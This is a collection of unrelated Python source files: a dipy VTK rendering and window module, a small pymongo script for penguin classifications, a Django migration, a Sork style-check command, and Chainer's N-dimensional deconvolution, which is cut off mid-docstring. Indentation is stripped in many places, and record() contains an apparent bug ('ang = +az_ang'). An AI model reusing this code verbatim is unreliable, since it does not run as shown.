""" Rotate the camera about the view up vector centered at the focal
point. Note that the view up vector is whatever was set via SetViewUp,
and is not necessarily perpendicular to the direction of projection.
The result is a horizontal rotation of the camera.
"""
self.GetActiveCamera().Azimuth(angle)
def yaw(self, angle):
""" Rotate the focal point about the view up vector, using the camera's
position as the center of rotation. Note that the view up vector is
whatever was set via SetViewUp, and is not necessarily perpendicular
to the direction of projection. The result is a horizontal rotation of
the scene.
"""
self.GetActiveCamera().Yaw(angle)
def elevation(self, angle):
""" Rotate the camera about the cross product of the negative of the
direction of projection and the view up vector, using the focal point
as the center of rotation. The result is a vertical rotation of the
scene.
"""
self.GetActiveCamera().Elevation(angle)
def pitch(self, angle):
""" Rotate the focal point about the cross product of the view up
vector and the direction of projection, using the camera's position as
the center of rotation. The result is a vertical rotation of the
camera.
"""
self.GetActiveCamera().Pitch(angle)
def roll(self, angle):
""" Rotate the camera about the direction of projection. This will
spin the camera about its axis.
"""
self.GetActiveCamera().Roll(angle)
def dolly(self, value):
""" Divide the camera's distance from the focal point by the given
dolly value. Use a value greater than one to dolly-in toward the focal
point, and use a value less than one to dolly-out away from the focal
point.
"""
self.GetActiveCamera().Dolly(value)
def camera_direction(self):
""" Get the vector in the direction from the camera position to the
focal point. This is usually the opposite of the ViewPlaneNormal, the
vector perpendicular to the screen, unless the view is oblique.
"""
return self.GetActiveCamera().GetDirectionOfProjection()
def renderer(background=None):
""" Create a renderer.
Parameters
----------
background : tuple
Initial background color of renderer
Returns
-------
v : Renderer
Examples
--------
>>> from dipy.viz import fvtk
>>> import numpy as np
>>> r=fvtk.ren()
>>> lines=[np.random.rand(10,3)]
>>> c=fvtk.line(lines, fvtk.colors.red)
>>> fvtk.add(r,c)
>>> #fvtk.show(r)
"""
deprecation_msg = ("Method 'dipy.viz.window.renderer' is deprecated, instead"
" use class 'dipy.viz.window.Renderer'.")
warn(DeprecationWarning(deprecation_msg))
ren = Renderer()
if background is not None:
ren.SetBackground(background)
return ren
if have_vtk:
ren = renderer
def add(ren, a):
""" Add a specific actor
"""
ren.add(a)
def rm(ren, a):
""" Remove a specific actor
"""
ren.rm(a)
def clear(ren):
""" Remove all actors from the renderer
"""
ren.clear()
def rm_all(ren):
""" Remove all actors from the renderer
"""
ren.rm_all()
def open_file_dialog(file_types=[("All files", "*")]):
""" Simple Tk file dialog for opening files
Parameters
----------
file_types : tuples of tuples
Accepted file types.
Returns
-------
file_paths : sequence of str
Returns the full paths of all selected files
"""
root = tkinter.Tk()
root.withdraw()
file_paths = filedialog.askopenfilenames(filetypes=file_types)
return file_paths
def save_file_dialog(initial_file='dipy.png', default_ext='.png',
file_types=(("PNG file", "*.png"), ("All Files", "*.*"))):
""" Simple Tk file dialog for saving a file
Parameters
----------
initial_file : str
For example ``dipy.png``.
default_ext : str
Default extension to appear in the save dialog.
file_types : tuples of tuples
Accepted file types.
Returns
-------
filepath : str
Complete filename of saved file
"""
root = tkinter.Tk()
root.withdraw()
file_path = filedialog.asksaveasfilename(initialfile=initial_file,
defaultextension=default_ext,
filetypes=file_types)
return file_path
class ShowManager(object):
""" This class is the interface between the renderer, the window and the
interactor.
"""
def __init__(self, ren=None, title='DIPY', size=(300, 300),
png_magnify=1, reset_camera=True, order_transparent=False,
interactor_style='custom'):
""" Manages the visualization pipeline
Parameters
----------
ren : Renderer() or vtkRenderer()
The scene that holds all the actors.
title : string
A string for the window title bar.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
png_magnify : int
Number of times to magnify the screenshot. This can be used to save
high resolution screenshots when pressing 's' inside the window.
reset_camera : bool
Default is True. You can change this option to False if you want to
keep the camera as set before calling this function.
order_transparent : bool
True is useful when you want to order transparent
actors according to their relative position to the camera. The
default option which is False will order the actors according to
the order of their addition to the Renderer().
        interactor_style : str or vtkInteractorStyle
            If a str, 'trackball' uses vtkInteractorStyleTrackballCamera(),
            'image' uses vtkInteractorStyleImage() (no rotation) and 'custom'
            uses CustomInteractorStyle. Otherwise you can pass in your own
            interactor style instance.
Attributes
----------
ren : vtkRenderer()
iren : vtkRenderWindowInteractor()
style : vtkInteractorStyle()
window : vtkRenderWindow()
Methods
-------
initialize()
render()
start()
add_window_callback()
Notes
-----
Default interaction keys for
* 3d navigation are with left, middle and right mouse dragging
* resetting the camera press 'r'
* saving a screenshot press 's'
        * for quitting press 'q'
Examples
--------
>>> from dipy.viz import actor, window
>>> renderer = window.Renderer()
>>> renderer.add(actor.axes())
>>> showm = window.ShowManager(renderer)
>>> # showm.initialize()
>>> # showm.render()
>>> # showm.start()
"""
if ren is None:
ren = Renderer()
self.ren = ren
self.title = title
self.size = size
self.png_magnify = png_magnify
self.reset_camera = reset_camera
self.order_transparent = order_transparent
self.interactor_style = interactor_style
if self.reset_camera:
self.ren.ResetCamera()
self.window = vtk.vtkRenderWindow()
self.window.AddRenderer(ren)
if self.title == 'DIPY':
self.window.SetWindowName(title + ' ' + dipy_version)
else:
self.window.SetWindowName(title)
self.window.SetSize(size[0], size[1])
if self.order_transparent:
# Use a render window with alpha bits
# as default is 0 (false))
self.window.SetAlphaBitPlanes(True)
# Force to not pick a framebuffer with a multisample buffer
# (default is 8)
self.window.SetMultiSamples(0)
# Choose to use depth peeling (if supported)
# (default is 0 (false)):
self.ren.UseDepthPeelingOn()
# Set depth peeling parameters
# Set the maximum number of rendering passes (default is 4)
ren.SetMaximumNumberOfPeels(4)
# Set the occlusion ratio (initial value is 0.0, exact image):
ren.SetOcclusionRatio(0.0)
if self.interactor_style == 'image':
self.style = vtk.vtkInteractorStyleImage()
elif self.interactor_style == 'trackball':
self.style = vtk.vtkInteractorStyleTrackballCamera()
elif self.interactor_style == 'custom':
self.style = CustomInteractorStyle()
else:
self.style = interactor_style
self.iren = vtk.vtkRenderWindowInteractor()
self.style.SetCurrentRenderer(self.ren)
# Hack: below, we explicitly call the Python version of SetInteractor.
self.style.SetInteractor(self.iren)
self.iren.SetInteractorStyle(self.style)
self.iren.SetRenderWindow(self.window)
def initialize(self):
""" Initialize interaction
"""
self.iren.Initialize()
def render(self):
""" Renders only once
"""
self.window.Render()
def start(self):
""" Starts interaction
"""
try:
self.iren.Start()
except AttributeError:
self.__init__(self.ren, self.title, size=self.size,
png_magnify=self.png_magnify,
reset_camera=self.reset_camera,
order_transparent=self.order_transparent,
interactor_style=self.interactor_style)
self.initialize()
self.render()
self.iren.Start()
self.window.RemoveRenderer(self.ren)
self.ren.SetRenderWindow(None)
del self.iren
del self.window
def record_events(self):
""" Records events during the interaction.
The recording is represented as a list of VTK events that happened
during the interaction. The recorded events are then returned.
Returns
-------
events : str
Recorded events (one per line).
Notes
-----
Since VTK only allows recording events to a file, we use a
temporary file from which we then read the events.
"""
with InTemporaryDirectory():
filename = "recorded_events.log"
recorder = vtk.vtkInteractorEventRecorder()
recorder.SetInteractor(self.iren)
recorder.SetFileName(filename)
def _stop_recording_and_close(obj, evt):
recorder.Stop()
self.iren.TerminateApp()
self.iren.AddObserver("ExitEvent", _stop_recording_and_close)
recorder.EnabledOn()
recorder.Record()
self.initialize()
self.render()
self.iren.Start()
# Retrieved recorded events.
events = open(filename).read()
return events
def record_events_to_file(self, filename="record.log"):
""" Records events during the interaction.
The recording is represented as a list of VTK events
that happened during the interaction. The recording is
going to be saved into `filename`.
Parameters
----------
filename : str
Name of the file that will contain the recording (.log|.log.gz).
"""
events = self.record_events()
# Compress file if needed
if filename.endswith(".gz"):
gzip.open(filename, 'wb').write(asbytes(events))
else:
open(filename, 'w').write(events)
def play_events(self, events):
""" Plays recorded events of a past interaction.
The VTK events that happened during the recorded interaction will be
played back.
Parameters
----------
events : str
Recorded events (one per line).
"""
recorder = vtk.vtkInteractorEventRecorder()
recorder.SetInteractor(self.iren)
recorder.SetInputString(events)
recorder.ReadFromInputStringOn()
self.initialize()
self.render()
recorder.Play()
def play_events_from_file(self, filename):
""" Plays recorded events of a past interaction.
The VTK events that happened during the recorded interaction will be
played back from `filename`.
Parameters
----------
filename : str
Name of the file containing the recorded events (.log|.log.gz).
"""
# Uncompress file if needed.
if filename.endswith(".gz"):
with gzip.open(filename, 'r') as f:
events = f.read()
else:
with open(filename) as f:
events = f.read()
self.play_events(events)
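    # Illustrative usage sketch (the file name is an assumption): a past
    # interaction can be captured and replayed with the two methods above.
    #
    #     showm = ShowManager(Renderer())
    #     showm.initialize()
    #     showm.record_events_to_file('session.log.gz')   # interact, then quit
    #     showm.play_events_from_file('session.log.gz')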
def add_window_callback(self, win_callback):
""" Add window callbacks
"""
self.window.AddObserver(vtk.vtkCommand.ModifiedEvent, win_callback)
self.window.Render()
def show(ren, title='DIPY', size=(300, 300),
png_magnify=1, reset_camera=True, order_transparent=False):
""" Show window with current renderer
Parameters
------------
ren : Renderer() or vtkRenderer()
The scene that holds all the actors.
title : string
A string for the window title bar. Default is DIPY and current version.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
png_magnify : int
Number of times to magnify the screenshot. Default is 1. This can be
used to save high resolution screenshots when pressing 's' inside the
window.
reset_camera : bool
Default is True. You can change this option to False if you want to
keep the camera as set before calling this function.
order_transparent : bool
True is useful when you want to order transparent
actors according to their relative position to the camera. The default
option which is False will order the actors according to the order of
their addition to the Renderer().
Notes
-----
Default interaction keys for
* 3d navigation are with left, middle and right mouse dragging
* resetting the camera press 'r'
* saving a screenshot press 's'
    * for quitting press 'q'
Examples
----------
>>> import numpy as np
>>> from dipy.viz import fvtk
>>> r=fvtk.ren()
>>> lines=[np.random.rand(10,3),np.random.rand(20,3)]
>>> colors=np.array([[0.2,0.2,0.2],[0.8,0.8,0.8]])
>>> c=fvtk.line(lines,colors)
>>> fvtk.add(r,c)
>>> l=fvtk.label(r)
>>> fvtk.add(r,l)
>>> #fvtk.show(r)
See also
---------
dipy.viz.window.record
dipy.viz.window.snapshot
"""
show_manager = ShowManager(ren, title, size,
png_magnify, reset_camera, order_transparent)
show_manager.initialize()
show_manager.render()
show_manager.start()
def record(ren=None, cam_pos=None, cam_focal=None, cam_view=None,
out_path=None, path_numbering=False, n_frames=1, az_ang=10,
magnification=1, size=(300, 300), reset_camera=True, verbose=False):
""" This will record a video of your scene
Records a video as a series of ``.png`` files of your scene by rotating the
    azimuth angle ``az_ang`` in every frame.
Parameters
-----------
ren : vtkRenderer() object
as returned from function ren()
cam_pos : None or sequence (3,), optional
Camera's position. If None then default camera's position is used.
cam_focal : None or sequence (3,), optional
Camera's focal point. If None then default camera's focal point is
used.
cam_view : None or sequence (3,), optional
Camera's view up direction. If None then default camera's view up
vector is used.
out_path : str, optional
Output path for the frames. If None a default dipy.png is created.
path_numbering : bool
When recording it changes out_path to out_path + str(frame number)
n_frames : int, optional
Number of frames to save, default 1
az_ang : float, optional
Azimuthal angle of camera rotation.
magnification : int, optional
How much to magnify the saved frame. Default is 1.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
reset_camera : bool
If True Call ``ren.reset_camera()``. Otherwise you need to set the
camera before calling this function.
verbose : bool
print information about the camera. Default is False.
Examples
---------
>>> from dipy.viz import fvtk
>>> r=fvtk.ren()
>>> a=fvtk.axes()
>>> fvtk.add(r,a)
>>> #uncomment below to record
>>> #fvtk.record(r)
>>> #check for new images in current directory
"""
if ren is None:
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(size[0], size[1])
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# ren.GetActiveCamera().Azimuth(180)
if reset_camera:
ren.ResetCamera()
renderLarge = vtk.vtkRenderLargeImage()
    # vtkRenderLargeImage takes a renderer through SetInput() in both older
    # and newer VTK versions, so no version check is needed here.
    renderLarge.SetInput(ren)
renderLarge.SetMagnification(magnification)
renderLarge.Update()
writer = vtk.vtkPNGWriter()
ang = 0
if cam_pos is not None:
cx, cy, cz = cam_pos
ren.GetActiveCamera().SetPosition(cx, cy, cz)
if cam_focal is not None:
fx, fy, fz = cam_focal
ren.GetActiveCamera().SetFocalPoint(fx, fy, fz)
if cam_view is not None:
ux, uy, uz = cam_view
ren.GetActiveCamera().SetViewUp(ux, uy, uz)
cam = ren.GetActiveCamera()
if verbose:
print('Camera Position (%.2f, %.2f, %.2f)' % cam.GetPosition())
print('Camera Focal Point (%.2f, %.2f, %.2f)' % cam.GetFocalPoint())
print('Camera View Up (%.2f, %.2f, %.2f)' % cam.GetViewUp())
for i in range(n_frames):
ren.GetActiveCamera().Azimuth(ang)
renderLarge = vtk.vtkRenderLargeImage()
renderLarge.SetInput(ren)
renderLarge.SetMagnification(magnification)
renderLarge.Update()
writer.SetInputConnection(renderLarge.GetOutputPort())
if path_numbering:
if out_path is None:
filename = str(i).zfill(6) + '.png'
else:
filename = out_path + str(i).zfill(6) + '.png'
else:
if out_path is None:
filename = 'dipy.png'
else:
filename = out_path
writer.SetFileName(filename)
writer.Write()
ang = +az_ang
def snapshot(ren, fname=None, size=(300, 300), offscreen=True,
order_transparent=False):
""" Saves a snapshot of the renderer in a file or in memory
Parameters
-----------
ren : vtkRenderer
as returned from function renderer()
fname : str or None
Save PNG file. If None return only an array without saving PNG.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
offscreen : bool
        Default True. Go stealth mode; no window should appear.
order_transparent : bool
Default False. Use depth peeling to sort transparent objects.
Returns
-------
arr : ndarray
Color array of size (width, height, 3) where the last dimension
holds the RGB values.
"""
width, height = size
if offscreen:
graphics_factory = vtk.vtkGraphicsFactory()
graphics_factory.SetOffScreenOnlyMode(1)
# TODO check if the line below helps in something
# graphics_factory.SetUseMesaClasses(1)
render_window = vtk.vtkRenderWindow()
if offscreen:
render_window.SetOffScreenRendering(1)
render_window.AddRenderer(ren)
render_window.SetSize(width, height)
if order_transparent:
# Use a render window with alpha bits
# as default is 0 (false))
render_window.SetAlphaBitPlanes(True)
# Force to not pick a framebuffer with a multisample buffer
# (default is 8)
render_window.SetMultiSamples(0)
# Choose to use depth peeling (if supported)
# (default is 0 (false)):
ren.UseDepthPeelingOn()
# Set depth peeling parameters
# Set the maximum number of rendering passes (default is 4)
ren.SetMaximumNumberOfPeels(4)
# Set the occlusion ratio (initial value is 0.0, exact image):
ren.SetOcclusionRatio(0.0)
render_window.Render()
window_to_image_filter = vtk.vtkWindowToImageFilter()
window_to_image_filter.SetInput(render_window)
window_to_image_filter.Update()
vtk_image = window_to_image_filter.GetOutput()
h, w, _ = vtk_image.GetDimensions()
vtk_array = vtk_image.GetPointData().GetScalars()
components = vtk_array.GetNumberOfComponents()
arr = vtk_to_numpy(vtk_array).reshape(h, w, components)
if fname is None:
return arr
writer = vtk.vtkPNGWriter()
writer.SetFileName(fname)
writer.SetInputConnection(window_to_image_filter.GetOutputPort())
writer.Write()
return arr
def analyze_renderer(ren):
class ReportRenderer(object):
bg_color = None
report = ReportRenderer()
report.bg_color = ren.GetBackground()
report.collection = ren.GetActors()
report.actors = report.collection.GetNumberOfItems()
report.collection.InitTraversal()
report.actors_classnames = []
for i in range(report.actors):
class_name = report.collection.GetNextActor().GetClassName()
report.actors_classnames.append(class_name)
return report
def analyze_snapshot(im, bg_color=(0, 0, 0), colors=None,
find_objects=True,
strel=None):
""" Analyze snapshot from memory or file
Parameters
----------
im: str or array
If string then the image is read from a file otherwise the image is
read from a numpy array. The array is expected to be of shape (X, Y, 3)
where the last dimensions are the RGB values.
colors: tuple (3,) or list of tuples (3,)
List of colors to search in the image
find_objects: bool
If True it will calculate the number of objects that are different
from the background and return their position in a new image.
strel: 2d array
Structure element to use for finding the objects.
Returns
-------
report : ReportSnapshot
        This is an object with attributes like ``colors_found`` that give
information about what was found in the current snapshot array ``im``.
"""
if isinstance(im, string_types):
im = imread(im)
class ReportSnapshot(object):
objects = None
labels = None
colors_found = False
report = ReportSnapshot()
if colors is not None:
if isinstance(colors, tuple):
colors = [colors]
flags = [False] * len(colors)
for (i, col) in enumerate(colors):
# find if the current color exist in the array
flags[i] = np.any(np.all(im == col, axis=-1))
report.colors_found = flags
if find_objects is True:
        # ITU-R BT.601 luma coefficients for RGB -> grayscale conversion.
        weights = [0.299, 0.587, 0.114]
gray = np.dot(im[..., :3], weights)
bg_color = im[0, 0]
background = np.dot(bg_color, weights)
if strel is None:
strel = np.array([[0, 1, 0],
[1, 1, 1],
[0, 1, 0]])
labels, objects = ndimage.label(gray != background, strel)
report.labels = labels
report.objects = objects
return report
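# Illustrative sketch (requires VTK; the colors checked are assumptions): an
# offscreen snapshot can be inspected for the presence of specific colors.
#
#     from dipy.viz import actor, window
#     ren = window.Renderer()
#     ren.add(actor.axes())
#     arr = window.snapshot(ren, size=(100, 100))
#     report = window.analyze_snapshot(arr, colors=[(255, 0, 0)])
#     print(report.colors_found)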
|
#!/usr/bin/env python
__author__ = 'greghines'
import numpy as np
import os
import pymongo
import sys
import urllib
import matplotlib.cbook as cbook
from PIL import Image
import matplotlib.pyplot as plt
import warnings
if os.path.exists("/home/ggdhines"):
sys.path.append("/home/ggdhines/PycharmProjects/reduction/experimental/clusteringAlg")
else:
sys.path.append("/home/greg/github/reduction/experimental/clusteringAlg")
from divisiveDBSCAN import DivisiveDBSCAN
if os.path.exists("/home/ggdhines"):
base_directory = "/home/ggdhines"
else:
base_directory = "/home/greg"
client = pymongo.MongoClient()
db = client['penguin_2014-10-12']
collection = db["penguin_classifications"]
collection2 = db["penguin_subjects"]
steps = [5,10,15,20]
penguins_at = {k:[] for k in steps}
alreadyThere = False
subject_index = 0
l = []
for subject in collection2.find({"classification_count": 20}):
subject_index += 1
#if subject_index == 2:
# break
l.append(subject["zooniverse_id"])
import cPickle as pickle
pickle.dump(l,open(base_directory+"/Databases/sample.pickle","wb"))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-08-19 10:48
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0036_auto_20170813_1108'),
]
operations = [
migrations.CreateModel(
name='PartAttachement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AddField(
model_name='file',
name='description',
field=models.TextField(blank=True, default=''),
),
migrations.AddField(
model_name='partattachement',
name='file',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.File'),
),
migrations.AddField(
model_name='partattachement',
name='part',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='attachements', to='api.Part'),
),
]
|
# This file is part of Sork.
#
# Copyright (C) 2016-2019 Martin Ejdestig <[email protected]>
#
# Sork is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sork is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sork. If not, see <http://www.gnu.org/licenses/>.
#
# SPDX-License-Identifier: GPL-3.0-or-later
import argparse
from .. import checks
from .. import concurrent
from .. import source
from ..project import Project
from ..progress_printer import ProgressPrinter
def add_argparse_subparser(subparsers: argparse.Action, source_paths_arg_name: str) -> None:
# TODO: Better fix? Have to silence mypy since Action does not have add_parser() and
# argparse._SubParserAction is not public.
parser = subparsers.add_parser('check', help='style check source code') # type: ignore
parser.set_defaults(run_command=run)
parser.add_argument('-c',
'--checks',
type=str,
help='Comma separated list of checks to perform. Overrides '
'configuration in .sork. Prepend - to disable a check. Regular '
'expressions may be used. All checks except foo: --checks=-foo . '
'Checks starting with clang-: --checks=clang-.* .',
metavar='<checks>')
parser.add_argument(source_paths_arg_name,
nargs='*',
help='Check path(s). Directories are recursed. All source code in '
'project, subject to configuration in .sork, is checked if no '
'%(metavar)s is passed or if only %(metavar)s passed is the '
'project\'s root.',
metavar='<path>')
def run(args: argparse.Namespace, project: Project) -> None:
check_strings = args.checks.split(',') if args.checks else project.config['checks']
enabled_checks = checks.create.from_strings(project, check_strings)
source_files = source.find_files(project, args.source_paths)
printer = ProgressPrinter(verbose=args.verbose)
printer.start('Checking source', len(source_files))
def check_source_file(source_file: source.SourceFile) -> None:
printer.start_with_item(source_file.path)
outputs = (c.run(source_file) for c in enabled_checks)
printer.done_with_item('\n'.join(o for o in outputs if o))
try:
concurrent.for_each(check_source_file, source_files, num_threads=args.jobs)
except BaseException:
printer.abort()
raise
|
import numpy
from six import moves
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.functions.connection import convolution_2d
from chainer.functions.connection import convolution_nd
from chainer import utils
from chainer.utils import conv
from chainer.utils import conv_nd
from chainer.utils import type_check
import chainerx
class DeconvolutionND(function_node.FunctionNode):
cover_all = None
def __init__(self, ndim, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
self.ndim = ndim
self.stride = conv_nd.as_tuple(stride, ndim)
self.pad = conv_nd.as_tuple(pad, ndim)
if outsize is not None:
assert len(outsize) == ndim
self.outs = outsize
self.dilate = conv_nd.as_tuple(dilate, ndim)
self.groups = groups
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(2 <= n_in, n_in <= 3)
x_type, w_type = in_types[:2]
type_check.expect(
x_type.dtype.kind == 'f',
w_type.dtype.kind == 'f',
x_type.ndim == self.ndim + 2,
w_type.ndim == self.ndim + 2,
x_type.shape[1] == w_type.shape[0]
)
if self.outs is not None:
for i, (out, s, p, di) in enumerate(zip(
self.outs, self.stride, self.pad, self.dilate)):
lower_bound = conv.get_conv_outsize(
out, w_type.shape[i + 2], s, p, d=di)
upper_bound = conv.get_conv_outsize(
out, w_type.shape[i + 2], s, p, cover_all=True, d=di)
type_check.expect(
lower_bound <= x_type.shape[i + 2],
x_type.shape[i + 2] <= upper_bound)
if type_check.eval(n_in) == 3:
b_type = in_types[2]
type_check.expect(
b_type.dtype.kind == 'f',
b_type.ndim == 1,
# Need to consider the case that group count > 1.
# b_type.shape[0] == w_type.shape[1]
)
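    # Worked example of the outsize bound check in check_type_forward above
    # (illustrative numbers): with outsize=8, ksize=3, stride=2, pad=0 and
    # dilate=1, get_conv_outsize(8, 3, 2, 0) == 3 and the cover_all variant
    # gives 4, so the corresponding input spatial size must lie in [3, 4].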
def _use_cudnn(self, x, W, b):
if ((cuda._cudnn_version < 6000
or configuration.config.cudnn_deterministic)
and any(d != 1 for d in self.dilate)):
# cuDNN < 6.0 and deterministic algorithms
# does not support dilated convolutions
return False
if cuda._cudnn_version < 7000 and 1 < self.groups:
# cuDNN < 7.0 does not support grouped convolutions
return False
return (
chainer.should_use_cudnn('>=auto')
and not self.cover_all
and self.ndim > 1
and x.dtype == W.dtype
and (b is None or x.dtype == b.dtype))
def _forward_xp(self, x, W, b, xp):
if 1 < self.groups:
return self._forward_grouped_convolution_xp(x, W, b, xp)
else:
return self._forward_xp_core(x, W, b, xp)
def _forward_grouped_convolution_xp(self, x, W, b, xp):
# G: group count
# N: batch size
# xC: input channels
# yC: output channels
G = self.groups
N, xC = x.shape[:2]
x_size = x.shape[2:]
yCg = W.shape[1]
yC = yCg * G
xCg = xC // G
k_size = W.shape[2:]
dims = len(k_size)
if xC % G != 0:
raise TypeError('The number of groups must be '
'a divisor of that of input channels')
x = xp.rollaxis(x, 1) # (xC, N, x_size...)
x = x.reshape(G, xCg, N * utils.size_of_shape(x_size))
W = W.reshape(G, xCg, yCg * utils.size_of_shape(k_size))
W = W.transpose(0, 2, 1) # (G, yCg*k_size, xCg)
# (G, yCg*k_size, N*x_size) = (G, yCg*k_size, xCg) @ (G, xCg, N*x_size)
col = convolution_2d._matmul(W, x).astype(x.dtype, copy=False)
col = col.reshape((yC,) + k_size + (N,) + x_size)
col = xp.rollaxis(col, dims + 1) # (N, yC, k_size..., x_size...)
y = conv_nd.col2im_nd(col, self.stride, self.pad, self.outs,
dilate=self.dilate)
if b is not None:
y += b.reshape(1, yC, *((1,) * dims))
return y,
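    # Shape walk-through for the grouped path above (illustrative numbers):
    # with G=2, N=1, xC=4 (so xCg=2), yCg=3 (so yC=6), k_size=(3, 3) and
    # x_size=(5, 5):
    #   x:   (1, 4, 5, 5) -> rollaxis -> (4, 1, 5, 5) -> reshape -> (2, 2, 25)
    #   W:   (4, 3, 3, 3) -> reshape -> (2, 2, 27) -> transpose -> (2, 27, 2)
    #   col: (2, 27, 2) @ (2, 2, 25) = (2, 27, 25) -> (6, 3, 3, 1, 5, 5)
    #        -> rollaxis -> (1, 6, 3, 3, 5, 5)
    # col2im_nd then scatters the columns back; with stride=2 and pad=0 the
    # output y has shape (1, 6, 11, 11).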
def _forward_xp_core(self, x, W, b, xp):
ndim = self.ndim
stride = self.stride
pad = self.pad
dilate = self.dilate
# gcol: C_O, k_1, ..., k_N, n, d_1, ..., d_N
gcol = xp.tensordot(W, x, (0, 1)).astype(x.dtype, copy=False)
# Roll n, which is batch size, before the first.
gcol = xp.rollaxis(gcol, ndim + 1)
# y: n, C_O, d_1, d_2, ..., d_N
if xp is numpy:
y = conv_nd.col2im_nd_cpu(
gcol, stride, pad, self.outs, dilate=dilate)
else:
y = conv_nd.col2im_nd_gpu(
gcol, stride, pad, self.outs, dilate=dilate)
if b is not None:
b_shape = (1, -1) + (1,) * ndim
y += b.reshape(b_shape)
return y,
def _forward_cudnn(self, x, W, b):
c = W.shape[1] * self.groups
n, in_c = x.shape[:2] # x: n, C_I, d_1, d_2, ..., d_N
# Make empty array for output.
y_shape = (n, c) + self.outs # (n, c_O, out_1, out_2, ..., out_N)
y = cuda.cupy.empty(y_shape, dtype=x.dtype)
pad = self.pad
stride = self.stride
dilate = self.dilate
groups = self.groups
deterministic = configuration.config.cudnn_deterministic
auto_tune = configuration.config.autotune
tensor_core = configuration.config.use_cudnn_tensor_core
cuda.cudnn.convolution_backward_data(
W, x, b, y, pad, stride, dilate, groups,
deterministic=deterministic, auto_tune=auto_tune,
tensor_core=tensor_core)
return y,
def forward_chainerx(self, inputs):
# TODO(imanishi): Support it
if any(d != 1 for d in self.dilate):
return chainer.Fallback
# TODO(imanishi): Support it
if self.groups != 1:
return chainer.Fallback
# TODO(imanishi): Support it
if any(a.dtype != inputs[0].dtype for a in inputs):
return chainer.Fallback
# TODO(imanishi): Supporft it
if inputs[0].device.backend.name == 'cuda' and self.ndim < 2:
return chainer.Fallback
stride = self.stride
pad = self.pad
return chainerx.conv_transpose(*inputs, stride=stride, pad=pad),
def forward(self, inputs):
self.retain_inputs((0, 1)) # only retain x and W
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
if self.outs is None:
dims = x.shape[2:]
ksize = W.shape[2:]
self.outs = tuple(
conv.get_deconv_outsize(d, k, s, p, d=di)
for d, k, s, p, di
in zip(dims, ksize, self.stride, self.pad, self.dilate))
assert all(out > 0 for out in self.outs), \
'Output sizes should be positive.'
self._set_cover_all(x, W)
xp = backend.get_array_module(*inputs)
if xp is numpy:
return self._forward_xp(x, W, b, numpy)
elif not self._use_cudnn(x, W, b):
return self._forward_xp(x, W, b, cuda.cupy)
else:
return self._forward_cudnn(x, W, b)
def backward(self, indexes, grad_outputs):
x, W = self.get_retained_inputs()
gy, = grad_outputs
ret = []
if 0 in indexes:
gx = chainer.functions.convolution_nd(
gy, W, stride=self.stride, pad=self.pad,
cover_all=self.cover_all, dilate=self.dilate,
groups=self.groups)
ret.append(gx)
if 1 in indexes:
gW, = convolution_nd.ConvolutionNDGradW(self).apply((gy, x))
ret.append(gW)
if 2 in indexes:
axis = (0,) + tuple(moves.range(2, gy.ndim))
gb = chainer.functions.sum(gy, axis=axis)
if gb.dtype != self.inputs[2].dtype:
gb = chainer.functions.cast(gb, self.inputs[2].dtype)
ret.append(gb)
return ret
def _set_cover_all(self, x, W):
x_shape = x.shape[2:]
k_shape = W.shape[2:]
self.cover_all = any(
ix != conv.get_conv_outsize(oy, k, s, p, d=di)
for (ix, oy, k, s, p, di)
in zip(x_shape, self.outs, k_shape, self.stride, self.pad,
self.dilate))
def deconvolution_nd(x, W, b=None, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
"""N-dimensional deconvolution function.
This is an implementation of N-dimensional deconvolution which generalizes
two-dimensional one. In most of deep learning frameworks and papers, this
function is called **transposed convolution**. But because of historical
reasons (e.g. paper by Ziller `Deconvolutional Networks`_) and backward
compatibility, this function is called **deconvolution** in Chainer.
.. _Deconvolutional Networks: \
http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf
It takes three variables: the input ``x``, the filter weight ``W``, and the
bias vector ``b``.
Notation: here is a notation for dimensionalities.
- :math:`N` is the number of spatial dimensions.
- :math:`n` is the batch size.
- :math:`c_I` and :math:`c_O` are the number of the input and output
channels, respectively.
- :math:`d_1, d_2, ..., d_N` are the size of each axis of the input's
spatial dimensions, respectively.
- :math:`k_1, k_2, ..., k_N` are the size of each axis of the filters,
respectively.
- :math:`p_1, p_2, ..., p_N` are the size of each axis of the spatial
padding size, respectively.
- :math:`s_1, s_2, ..., s_N` are the stride of each axis of filter
application, respectively.
If ``outsize`` option is ``None``, the output size
:math:`(l_1, l_2, ..., l_N)` is determined by the following equations with
the items in the above list:
.. math::
l_n = s_n (d_n - 1) + k_n - 2 p_n \\ \\ (n = 1, ..., N)
If ``outsize`` option is given, the output size is determined by
``outsize``. In this case, the ``outsize`` :math:`(l_1, l_2, ..., l_N)`
must satisfy the following equations:
.. math::
d_n = \\lfloor (l_n + 2p_n - k_n) / s_n \\rfloor + 1 \\ \\ \
(n = 1, ..., N)
Deconvolution links can use a feature of cuDNN called autotuning, which
selects the most efficient CNN algorithm for images of fixed-size,
can provide a significant performance boost for fixed neural nets.
To enable, set `chainer.using_config('autotune', True)`
Args:
x (:class:`~chainer.Variable` or :ref:`ndarray`):
